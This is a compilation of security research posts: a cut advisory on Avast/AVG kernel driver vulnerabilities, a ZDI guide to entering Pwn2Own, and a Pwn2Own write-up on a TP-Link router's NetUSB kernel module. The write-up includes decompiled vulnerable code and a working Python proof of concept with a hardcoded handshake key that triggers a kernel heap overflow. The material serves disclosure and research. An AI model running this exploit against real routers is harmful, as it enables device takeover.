    if (send(s, message, (int)strlen(message), 0) == SOCKET_ERROR) {
        puts("Send failed");
        return 1;
    }
    puts("Data Sent!\n");

So the whole flow looks like this:

Once the vulnerability is triggered, the user sees the following alert from the OS.

CVE-2022-26523

The second vulnerable function is at aswArPot+0xbb94 and is very similar to the first vulnerability. This function double fetches the Length field from a user controlled pointer, too.

This vulnerable code is part of several handlers in the driver and, therefore, can be triggered in multiple ways, such as via the image load callback.

Both of these vulnerabilities were fixed in version 22.1.

Impact

Due to the nature of these vulnerabilities, they can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, the vulnerabilities could be exploited as part of a second stage browser attack or to perform a sandbox escape, among other possibilities.

As we have noted with similar flaws in other products recently (1, 2, 3), such vulnerabilities have the potential to allow complete take over of a device, even without privileges, due to the ability to execute code in kernel mode. One obvious abuse of such vulnerabilities is to bypass security products.

Mitigation

The majority of Avast and AVG users will receive the patch (version 22.1) automatically; however, those using air-gapped or on-premises installations are advised to apply the patch as soon as possible.

Conclusion

These high-severity vulnerabilities affect millions of users worldwide. As with another vulnerability SentinelLabs disclosed that remained hidden for 12 years, the impact this could have on users and enterprises that fail to patch is far reaching and significant.

While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, with dozens of millions of users affected, it is possible that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to help not only our customers but also the community to understand the risk and to take action.

As part of the commitment of SentinelLabs to advancing industry security, we actively invest in vulnerability research, including advanced threat modeling and vulnerability testing of various platforms and technologies.

We would like to thank Avast for their approach to our disclosure and for quickly remediating the vulnerabilities.

Disclosure Timeline

  • 20 December, 2021 – Initial disclosure.
  • 04 January, 2022 – Avast acknowledges the report.
  • 11 February, 2022 – Avast notifies us that the vulnerabilities are fixed.

What to Expect when Exploiting: A Guide to Pwn2Own Participation

So you’ve heard of Pwn2Own and think you are up to the challenge of competing in the world’s most prestigious hacking competition. Great! We would love to have you! However, there are a few things you should know before we get started. With Pwn2Own Vancouver just around the corner, here are 10 things you need to know before participating in Pwn2Own.

1.     You need to register before the contest.

We try to make this as apparent as possible in the rules, but we still have people walk into the room on the first day of the contest hoping to participate. There are a lot of logistics around Pwn2Own, so we need everyone to complete their registration before the contest starts. We can’t support anyone who wants to join on the first day of the competition.

2.     You need to answer the vetting email.

Again, the logistics of running the Pwn2Own competition can be daunting. One way we prepare is by vetting all entries before registration closes. We need to understand the nature of your exploit to ensure it fits within the rules and to ensure we have everything we need on hand to run the attempt. For example, we need to know how you plan on demonstrating if the exploit is successful. If you answer, “Our exploit will provide a root shell when it has succeeded” – we know you have a solid plan and that it is within the rules. If you tell us you need to start as an admin user and require four reboots, your entry is unlikely to qualify. We’ll also ask for things like other user interactions or the need for a Man-in-the-Middle (MitM). These could disqualify the entry – or it could be fine. It depends on the target and details, which is why we want to know before the competition. It’s not fair to any of the contestants to have them think their exploit is a winner just to be disqualified during the contest.

3.     What should we call you?

We know people enter Pwn2Own to win cash and prizes, but they want recognition, too. We’re more than happy to include your Twitter handle, your company name, or just about anything else. Just let us know. We try to pre-stage a lot of our communications, so an omission or misspelling could take a bit to get fixed, and we want to give contestants the attention they deserve. You’d be surprised how many people wait until during or after the event to clarify how they wish to be mentioned.

4.     Will you be participating locally or remotely?

This is a newer question, but opening up the contest to remote participation has allowed many to participate who otherwise could not. However, remote contestants have a few extra hurdles the on-site participants do not. For remote participants, all artifacts must be submitted to the ZDI prior to registration closing. This includes things like the white paper, the exploit, and any further details needed for the entry. Contestants competing in person have until the contest begins to have these deliverables ready.

5.     Are you aware a white paper is required for each entry?

This is one aspect that many don’t realize. Each entry in Pwn2Own needs an accompanying white paper describing the vulnerabilities used during the attempt. These white papers are critical in the judging of the competition, especially if exploits from different contestants seem similar. For example, if two groups both use a use-after-free bug against a target, is it the same bug? Maybe. Maybe not. A clearly written white paper will help us understand your research and identify whether it is unique or a bug collision. It also helps the vendor pinpoint the exact place to look at when they start working on the fix.

6.     Ask questions before the competition.

There can be a lot of nuances in exploiting targets at Pwn2Own. How will we judge certain scenarios? How will the targets be configured? Does this type of exploit qualify for this bonus? Is the target in this configuration or that configuration? Is this software completely in the default configuration, or is this commonly applied setting used? There are a lot of very reasonable questions to ask before the contest, and we try to answer every one of them the best we can. If you are thinking about participating but have specific configuration or rule-related questions, please e-mail us. Questions asked over Twitter or other means may not be answered in a timely manner. It might seem archaic to some, but e-mail makes it easier to track inquiries and ensure they get responses.

7.     Be prepared for things to go wrong.

Five minutes seems like plenty of time – until you’re on stage at Pwn2Own and there’s a clock counting down. If your first attempt fails, do you have a plan? What are you going to check? Can you adjust your exploit in a meaningful way within the allotted time? Certain types of exploits work better at Pwn2Own than others. For example, timing attacks and race conditions might not be the best choice to use at Pwn2Own. Yes, your exploit may work 100% of the time before you arrive at the contest, but what if it doesn’t when you’re on stage? Make a plan B, and probably a plan C and D as well.

8.     Are you participating as an individual, a part of a team, or representing a company?

While we do want maximum participation in each contest, we also need to place some restrictions on how that participation occurs. For example, if you are representing a company, you can’t also participate as an individual. If you are a part of a small team, you can’t also represent a company. This restriction helps keep the contest fair to everyone involved and prevents bug sharing meant to skew the overall results.

9.     When you arrive at the contest, take a minute to confirm the target versions.

Before the contest begins – even before we do the drawing for order – we allow contestants to verify configurations and software versions of the targets. We always use the latest and greatest versions of available software as Pwn2Own targets, and vendors are known to release patches right before the competition in a last-ditch attempt to thwart contestants. It’s a good idea to take a minute and double-check the versions in the contest are the same versions you were testing back home. We will communicate the versions before the contest, so you will know what to target.

10.  Rub a rabbit’s foot, grab a four-leafed clover, or do whatever else brings you luck.

Thanks to the drawing for order at the beginning of each contest, there is a degree of randomness to the competition. You could end up with a great spot in the schedule, or you could end up late in the contest when the chances for bug collisions are higher. But you can’t rely on luck, either. Some teams will just move on to a new target as soon as they find a bug to try to get as many entries in as possible and hope for a good draw - even if their bugs are low-hanging fruit. However, the teams that really want to compete for Master of Pwn spend a lot of time going deep and finding bugs other teams may miss. Pwn2Own is certainly a competition of skill but having a little luck (at least good luck) never hurts either.

Of course, there’s a lot more to participating in Pwn2Own than just these 10 things, but these will definitely help you prepare for the competition and, hopefully, increase your chances of winning. We really do root for all of the contestants, and we want to do all we can to increase your chances of success. Still, we need to adjudicate the contest fairly for all competitors. If you are on the fence about participating in Pwn2Own, I hope this guidance helps you find the right path to joining us. We celebrate the 15th anniversary of the contest this year in Vancouver, and we’d love to see you there.


[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

An introduction to Use-After-Free exploitation and walking through one of my old challenges.

Challenge Info: https://www.malwaretech.com/challenges/windows-exploitation/user-after-free-1-0
Download Link: https://malwaretech.com/downloads/challenges/UserAfterFree2.0.rar
Password: MalwareTech

The post [Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1) appeared first on MalwareTech.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools and learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I was quickly horrified by what I found and wrote Longue vue 🔭 over the weekend, which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate in the contest and, after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, and the hardware was easy and cheap to get, so it felt like the right choice.

router targets

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on to Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it; you just want one to be able to figure out what the interesting attack surfaces are.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post-auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two lines of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low-hanging fruit and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading, as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new ground to lower the chance of entering the competition with a duplicate and also maximize my chances of finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptables rules, sockets listening, crontab, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting:

  • the uhttpd HTTP server,
  • the third-party dnsmasq service, which could potentially be missing patches for upstream bugs (unlikely?),
  • the tdpServer, which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.
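To illustrate what a shuffled opcode table means in practice, here is a hypothetical Python sketch that rewrites the opcode field of compiled instructions back to stock values. It assumes a Lua 5.1-style encoding where the opcode lives in the low 6 bits of each 32-bit instruction, and that the shuffled-to-stock mapping has already been recovered somehow. It is not the approach used in this research (the post does not describe it), and a real tool would also need to parse the bytecode chunk to locate each function's code array.

```python
OPCODE_MASK = 0x3F  # assumption: Lua 5.1-style encoding, opcode in bits 0-5


def remap_instruction(insn: int, shuffled_to_stock: dict[int, int]) -> int:
    """Rewrite the opcode field of one 32-bit instruction, keeping its operands."""
    opcode = insn & OPCODE_MASK
    stock = shuffled_to_stock.get(opcode, opcode)
    return (insn & ~OPCODE_MASK & 0xFFFFFFFF) | stock


def remap_code(words: list[int], shuffled_to_stock: dict[int, int]) -> list[int]:
    """Apply the opcode mapping to every instruction of a function's code array."""
    return [remap_instruction(w, shuffled_to_stock) for w in words]


# Hypothetical mapping: shuffled opcode 5 is stock opcode 0, and vice versa.
mapping = {5: 0, 0: 5}
print([hex(w) for w in remap_code([(0x123 << 6) | 5, (0x7 << 6) | 0], mapping)])
# ['0x48c0', '0x1c5']
```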

Another thing I burned time on was going through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out whether dnsmasq was properly patched against recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed otherwise 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, after googling and looking around, it turns out that those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.
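Spotting such entries can be automated with a few lines of Python over the netstat output. This is a minimal sketch assuming the busybox netstat -platue column layout shown above (the function name is hypothetical). Note that '-' only means netstat could not map the socket to a process; when running as root, that usually points to a kernel-owned socket.

```python
def ownerless_sockets(netstat_output: str) -> list[tuple[str, str]]:
    """Return (protocol, local address) for sockets with no PID/Program name."""
    results = []
    for line in netstat_output.splitlines():
        cols = line.split()
        # Skip banner/header lines; data lines start with the protocol name.
        if not cols or cols[0] not in ("tcp", "udp", "tcp6", "udp6"):
            continue
        # cols[3] is Local Address; the last column is PID/Program name
        # (UDP rows have no State column, but both indices still hold).
        if cols[-1] == "-":
            results.append((cols[0], cols[3]))
    return results


sample = """\
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
"""
print(ownerless_sockets(sample))
# [('tcp', '0.0.0.0:33344'), ('tcp', '0.0.0.0:20005'), ('udp', '0.0.0.0:54480')]
```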

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where attacker input is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]);                      // <-- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0);   // <-- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))
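The excerpt does not show the width of v64[0]. Assuming it is a 32-bit unsigned value and the addition wraps at 32 bits, this Python sketch (hypothetical helper name) shows how an attacker-chosen length turns v64[0] + 9 into a tiny allocation size:

```python
U32_MASK = 0xFFFFFFFF


def alloc_size(attacker_len: int) -> int:
    """Model `v64[0] + 9` evaluated in 32-bit unsigned arithmetic (assumed width)."""
    return (attacker_len + 9) & U32_MASK


for n in (0x10, 0xFFFFFFF7, 0xFFFFFFFF):
    print(hex(n), "->", alloc_size(n))
# 0x10 -> 25
# 0xfffffff7 -> 0
# 0xffffffff -> 8
```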

I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer, but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefully, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  int GetLen;
  if(SbusConnection) {
    if(Buffer) {
      if(BufferLen) {
        // Keep receiving until BufferLen bytes have arrived or KTCP_get returns <= 0
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is essentially a wrapper around ks_recv, which means an attacker can make the function return without reading the whole BufferLen amount of bytes: once the attacker stops sending and closes the connection (or the receive otherwise fails), KTCP_get returns a value <= 0 and the loop bails out. This meant that I could force the allocation of a small buffer and overflow it with as much data as I wanted. If you are interested in learning how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py, or read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The code below can trigger the above vulnerability:

from Crypto.Cipher import AES  # provided by pycryptodome
import argparse
import socket
import struct

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.sendall(b'\x56\x04')
  # Send random data
  s.sendall(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.sendall(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  b = name
  if isinstance(name, str):
    b = name.encode('ascii')
  length = len(b)
  assert length - 1 < 63
  s.sendall(le32(length))
  s.sendall(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  # Command bytes selecting the vulnerable message handler
  s.sendall(le8(0xff))
  s.sendall(le8(0x21))
  # Length field: 0xffffffff + 9 wraps around to 8 in 32-bit arithmetic
  s.sendall(le32(0xff_ff_ff_ff))
  # Far more data than the tiny page allocation can hold
  p = b'\xab' * (0x1_000 * 100)
  s.sendall(p)

if __name__ == '__main__':
  main()
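To make the short-read behaviour of SoftwareBus_fillBuf concrete, here is a small Python model of its receive loop. It is a sketch, not the driver code: a local socketpair stands in for the NetUSB connection, the driver writes straight into its buffer rather than collecting bytes, and fill_buf is a hypothetical name. The point is that a huge requested length does not force the sender to transmit 4GB; the loop keeps copying until the peer closes the connection, so the sender decides how many bytes land in the undersized buffer.

```python
import socket

def fill_buf(sock: socket.socket, length: int) -> tuple[bool, bytes]:
    """Model of SoftwareBus_fillBuf: keep receiving until `length` bytes have
    arrived or the receive reports end-of-stream (KTCP_get returning <= 0)."""
    received = bytearray()
    while length:
        chunk = sock.recv(min(length, 65536))
        if not chunk:  # peer closed the connection: the driver logs and returns 0
            return False, bytes(received)
        received += chunk
        length -= len(chunk)
    return True, bytes(received)

# The "attacker" side sends 100 bytes and hangs up, even though the
# receiver was told to expect 0xffffffff bytes.
attacker, victim = socket.socketpair()
attacker.sendall(b"\xab" * 100)
attacker.close()
ok, data = fill_buf(victim, 0xFFFFFFFF)
victim.close()
print(ok, len(data))  # False 100
```

Every one of those 100 bytes would already have been copied before the loop gives up, which is why the failed return value does not prevent the overflow.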

Another interesting detail was that the allocation function is mallocPageBuf, which I didn't know about. After looking into its implementation, I saw that it eventually calls into __get_free_pages, which is part of the Linux kernel. __get_free_pages allocates 2**n contiguous pages and is implemented using what is called a Binary Buddy Allocator. I wasn't familiar with that kind of allocator and ended up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content, and I was able to overflow the pages with pretty much as much data as I wanted. The one thing I couldn't fully control was the size passed to the allocation: because of the integer overflow, I could only trigger a mallocPageBuf call with a size in the interval [0, 8]. mallocPageBuf aligns the passed size to the next power of two and calculates the order (n in 2**n) to invoke __get_free_pages.
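The arithmetic can be checked with a few lines of Python. This is a sketch under assumptions: alloc_size models the 32-bit addition from the decompiled code, and page_order follows the semantics of the kernel's get_order() (smallest n such that 2**n pages hold the size). The exact rounding mallocPageBuf performs is not shown in the post, so treat page_order as an approximation.

```python
PAGE_SIZE = 4096  # the driver logs "PAGE_SIZE 4096" at init

def alloc_size(length_field: int) -> int:
    """mallocPageBuf(v64[0] + 9, ...) evaluated in 32-bit unsigned arithmetic."""
    return (length_field + 9) & 0xFFFFFFFF

def page_order(size: int) -> int:
    """Smallest n such that 2**n pages hold `size` bytes (like get_order())."""
    order = 0
    while (PAGE_SIZE << order) < size:
        order += 1
    return order

# Every length field that wraps yields a tiny size, hence a single (order-0) page,
# while fillBuf is still asked to read the full, huge length into it.
for length_field in (0xFFFFFFF7, 0xFFFFFFFB, 0xFFFFFFFF):
    size = alloc_size(length_field)
    print(hex(length_field), size, page_order(size))
# 0xfffffff7 0 0
# 0xfffffffb 4 0
# 0xffffffff 8 0
```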

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

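int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);        // format the message (the va_list argument is not shown by the decompiler)
  v2 = v1 < 257;
  v3 = v1 + 1;                  // length including the NUL terminator
  if(!v2) {
    v6[256] = 0;                // truncate long messages to 256 characters + NUL
    v3 = 257;
  }
  v5 = v3;                      // 4-byte length, apparently stored right before v6
  kc_dbgD_send(&v5, v3 + 4);    // <-- send length + message over the debug socket
  return printk("<1>%s", v6);
}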

Pretty funny, right?
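Based only on the decompiled kc_printf above, each debug message appears to be sent as a 4-byte length (counting the trailing NUL) followed by the string itself, capped at 257 bytes. The sketch below parses that framing and pulls kernel-looking addresses out of the text. The big-endian length is an assumption (the Archer C7 and the qemu-system-mips emulation are big-endian MIPS), the debug port is not specified here, and parse_frames / kernel_pointers are hypothetical helpers, not the exploit's Leaker class.

```python
import re
import struct

# Kernel addresses seen in this post (e.g. 0x869c6e38, 0x85173480) start with 0x8.
KERNEL_PTR = re.compile(rb"\b(?:0x)?(8[0-9a-fA-F]{7})\b")

def parse_frames(buf: bytes) -> tuple[list[bytes], bytes]:
    """Split a stream into [length:u32][length bytes] frames.
    Returns the complete messages and any leftover partial frame."""
    messages = []
    while len(buf) >= 4:
        (length,) = struct.unpack(">I", buf[:4])
        if len(buf) < 4 + length:
            break  # incomplete frame: wait for more data
        messages.append(buf[4:4 + length].rstrip(b"\x00"))
        buf = buf[4 + length:]
    return messages, buf

def kernel_pointers(message: bytes) -> list[int]:
    return [int(m, 16) for m in KERNEL_PTR.findall(message)]

msg = b"INFO16EC:  infomap 869c6e38\x00"
stream = struct.pack(">I", len(msg)) + msg + b"\x00\x00"  # second frame still incomplete
messages, rest = parse_frames(stream)
print(messages, rest)
print([hex(p) for p in kernel_pointers(messages[0])])
```

Keeping the leftover bytes lets a receiver call parse_frames repeatedly as TCP delivers data in arbitrary chunks.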

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob, so this lack of introspection wasn't going to work. What were my options?

Well, as I mentioned earlier, TP-Link maintains a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement over my current situation. I would be able to hook up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. On the surface, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest, I have forgotten most of the details, but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering, but it was not. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that booted just fine, and decided that I would try to merge both kernel configurations until I ended up with a bootable image whose configuration was as close as possible to the kernel running on the device. Same kernel version, same allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob, I failed to really see the complexity there. So I got started on this journey where I must have easily compiled 100+ kernels before being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size and layout of internal structures. This means that if you are trying to run a driver A on kernel B, driver A might assume a structure is of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device structure below shows that its definition varies depending on whether kernel configuration options are on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any type used by this structure can do the same, which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};
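The layout shift is easy to reproduce with ctypes. The sketch below is a toy, not the real net_device: net_device_sketch and its handful of fields are hypothetical, chosen only to mirror the #ifdef pattern above. A driver compiled with an option enabled expects later members at larger offsets than a kernel built without it. On the 32-bit MIPS target pointers are 4 bytes; on a 64-bit host the shift shows up as 8 bytes per pointer.

```python
import ctypes

def net_device_sketch(config: dict[str, bool]) -> type[ctypes.Structure]:
    """Toy stand-in for struct net_device: some members are only compiled in
    when the matching CONFIG_ option is enabled."""
    fields = [("name", ctypes.c_char * 16)]
    if config.get("CONFIG_WIRELESS_EXT"):
        fields += [("wireless_handlers", ctypes.c_void_p),
                   ("wireless_data", ctypes.c_void_p)]
    if config.get("CONFIG_VLAN_8021Q"):
        fields += [("vlan_info", ctypes.c_void_p)]
    fields += [("flags", ctypes.c_uint)]  # a member the driver reads at a fixed offset
    return type("net_device_sketch", (ctypes.Structure,), {"_fields_": fields})

# The driver was built with VLAN support, the test kernel without it.
driver_view = net_device_sketch({"CONFIG_WIRELESS_EXT": True, "CONFIG_VLAN_8021Q": True})
kernel_view = net_device_sketch({"CONFIG_WIRELESS_EXT": True})
print(driver_view.flags.offset, kernel_view.flags.offset)
```

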